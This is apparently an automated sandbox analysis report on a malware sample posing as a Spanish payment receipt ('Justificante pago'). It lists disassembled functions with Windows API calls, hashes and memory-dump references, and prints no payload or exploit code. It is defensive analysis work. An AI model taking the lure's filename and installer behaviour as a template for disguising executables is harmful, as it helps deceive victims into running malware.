                                                                                                                                                                                    • Instruction ID: bd26b540472948519bfd0c296b0258925a36bd111cdc3ec084d9598cfd27fd02
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                                                                                                                                                                                    • Instruction Fuzzy Hash: A16180B1900209FFDB10AF61DD85AAA7B69FB84314F00853AFA05B62D1C7789D61CF99
                                                                                                                                                                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                    • DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                    • String ID: F
                                                                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                                                                    • Opcode ID: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                                                                                                                                                                                    • Instruction ID: ce1ac2179a7edcd12a9bbec6f3b07c603adbad34dac6b1105353c89659c02e28
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                                                                                                                                                                                    • Instruction Fuzzy Hash: 63417B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0CB74DA55DFA4
                                                                                                                                                                                    Function 0040614D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062E8,?,?), ref: 00406188
                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 00406191
                                                                                                                                                                                      • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                                                                                                                                                                                      • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(?,004275A8,00000400), ref: 004061AE
                                                                                                                                                                                    • wsprintfA.USER32 ref: 004061CC
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 00406207
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406216
                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040624E
                                                                                                                                                                                    • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062A4
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004062B5
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062BC
                                                                                                                                                                                      • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Justificante pago-09453256434687.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                                                                                                                                                                      • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                    • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                    • API String ID: 2171350718-461813615
                                                                                                                                                                                    • Opcode ID: dc4682ef79e092581efd41d4f88914fec7f2984e6363dc945e8c6098decd7ff7
                                                                                                                                                                                    • Instruction ID: ee14a5085299e91e75cde0480e6b7733258fb9cdf367bc6c01a907801337673b
                                                                                                                                                                                    • Opcode Fuzzy Hash: dc4682ef79e092581efd41d4f88914fec7f2984e6363dc945e8c6098decd7ff7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 03312130201715BFD2207B619D48F2B3AACEF41718F16007EBD42F62C2DE3C982586AD
                                                                                                                                                                                    Function 004044CA Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 004044E7
                                                                                                                                                                                    • GetSysColor.USER32(00000000), ref: 00404525
                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00404531
                                                                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 0040453D
                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 00404550
                                                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00404560
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040457A
                                                                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404584
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                                                                    • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                                    • Instruction ID: 38e33b6b7dbb33234eb72a45dbf2bae34717d2ad5d3f2d744b20a042554d00e7
                                                                                                                                                                                    • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 072133B1500704BBCB319F68DD08B5BBBF8AF45714F04896EEB96A26E1D734E904CB58
                                                                                                                                                                                    Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                                                                                                      • Part of subcall function 004060D8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004060EE
                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                    • String ID: 9
                                                                                                                                                                                    • API String ID: 163830602-2366072709
                                                                                                                                                                                    • Opcode ID: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
                                                                                                                                                                                    • Instruction ID: 3c27e7501abded1006c2f30e54a373b5f9dac3b1129e645fb880415469f2e5e7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2351FA75D00219AADF20DF95CA89AAEBB79FF04304F10817BE541B62D0D7B49D82CB59
                                                                                                                                                                                    Function 0040678E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
                                                                                                                                                                                    • CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
                                                                                                                                                                                    • CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
                                                                                                                                                                                    • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                                                                    • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 589700163-4010320282
                                                                                                                                                                                    • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                                    • Instruction ID: 0f69a0116b7f1ba106e871a719c63b07a343e19011b313dcb24ddb0bfcf4baff
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                                    • Instruction Fuzzy Hash: CE11862A80161299D7303B149D40A7762FCEF98764F56843FE986732C0E77C4CD286BD
                                                                                                                                                                                    Function 00404E1E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E39
                                                                                                                                                                                    • GetMessagePos.USER32 ref: 00404E41
                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404E5B
                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E6D
                                                                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404E93
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                                                                    • String ID: f
                                                                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                                                                    • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                    • Instruction ID: 39da0b83e90955b658913b401ee9b713f1841a36fe6a8bad0240d4c742fa7cb5
                                                                                                                                                                                    • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                    • Instruction Fuzzy Hash: E9018C72A0021DBADB00DBA4CD81FFEBBB8AF55710F10002BBA51B61C0C7B49A018BA4
                                                                                                                                                                                    Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                                                                                                                    • MulDiv.KERNEL32(0010DC95,00000064,?), ref: 00402FDC
                                                                                                                                                                                    • wsprintfW.USER32 ref: 00402FEC
                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • verifying installer: %d%%, xrefs: 00402FE6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                                                                    • Opcode ID: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
                                                                                                                                                                                    • Instruction ID: 6e758109fa8cded6d2ea51641b68a6ee4e1df044416b280c1a6c4c5bd582b841
                                                                                                                                                                                    • Opcode Fuzzy Hash: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
                                                                                                                                                                                    • Instruction Fuzzy Hash: B1014F7164020DABEF609F60DE4ABEA3B69FB00345F008039FA06B51D1DBB999559F58
                                                                                                                                                                                    Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2667972263-0
                                                                                                                                                                                    • Opcode ID: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
                                                                                                                                                                                    • Instruction ID: f067c9a989b14af8d706ebefa04c24d1529afff37e35bb6a261b9bb9a52bb1c4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
                                                                                                                                                                                    • Instruction Fuzzy Hash: 71318F71D01114BBCF216FA5CE49D9EBE79EF09364F14023AF550762E0CB794D429B98
                                                                                                                                                                                    Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
